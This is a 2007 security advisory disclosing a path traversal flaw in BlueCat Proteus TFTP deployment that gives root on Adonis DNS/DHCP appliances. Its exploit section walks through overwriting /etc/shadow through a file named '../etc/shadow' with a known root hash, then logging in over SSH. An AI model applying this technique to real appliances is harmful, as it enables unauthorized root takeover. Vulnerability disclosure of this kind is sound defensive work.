TS-2007-002-0: BlueCat Networks Adonis root Privilege Access

2007-08-07T00:00:00
ID SECURITYVULNS:DOC:17713
Type securityvulns
Reporter Securityvulns
Modified 2007-08-07T00:00:00

Description

Template Security Security Advisory

BlueCat Networks Adonis root Privilege Access

Date: 2007-08-06 Advisory ID: TS-2007-002-0 Vendor: BlueCat Networks, http://www.bluecatnetworks.com/ Revision: 0

Contents

Summary Software Version Details Impact Exploit Workarounds Obtaining Patched Software Credits Revision History

Summary

Template Security has discovered a serious user input validation vulnerability in the BlueCat Networks Proteus IPAM appliance. Proteus can be used to upload files to managed Adonis appliances to be downloadable by TFTP from the appliance. A Proteus administrator with privilege to add TFTP files and perform TFTP deployments can overwrite existing files and create new files as root on the Adonis DNS/DHCP appliance. This can be used for example to overwrite the system password database and change the root account password.

Software Version

Proteus version 2.0.2.0 and Adonis version 5.0.2.8 were tested.

Details

Proteus allows TFTP files to be named by an administrator, and there is no data validation performed for user input such as relative paths. Files are supposed to be copied only to the /tftpboot/ directory, and the file copy is performed with root privilege. This means for example that a file named "../etc/shadow" will overwrite the shadow password database "/etc/shadow".

Impact

Successful exploitation of the vulnerability will result in root access on the Adonis appliance.

Exploit

0) Create a new TFTP Group in a Proteus configuration.

1) Add a TFTP deployment role specifying an Adonis appliance to the group.

2) At the top-level folder in the new TFTP group, add a file named "../etc/shadow" (without the quotes) and load a file containing the following line:

 root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

 NOTE: The sshd configuration uses the default setting
 'PermitEmptyPasswords no', so we specify a password of
 bluecat.

3) Deploy the configuration to the Adonis appliance.

4) You can now login to the Adonis appliance as root with password bluecat.

 $ ssh root@192.168.1.11
 root@192.168.1.11's password: 
 # cat /etc/shadow
 root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

 NOTE: This example assumes SSH is enabled, iptables permits
 port tcp/22, etc.

Many attack variations are possible, such as changing system startup scripts to modify the iptables configuration on the appliance.

Workarounds

The attack can be prevented by creating an access right override at the configuration level to disable TFTP access for each administrator.

Obtaining Patched Software

Contact the vendor.

Credits

defaultroute discovered this vulnerability while performing a security review of the Proteus IPAM appliance (a discovery fueled by Red Bull and techno). defaultroute is a member of Template Security.

Revision History

2007-08-06: Revision 0 released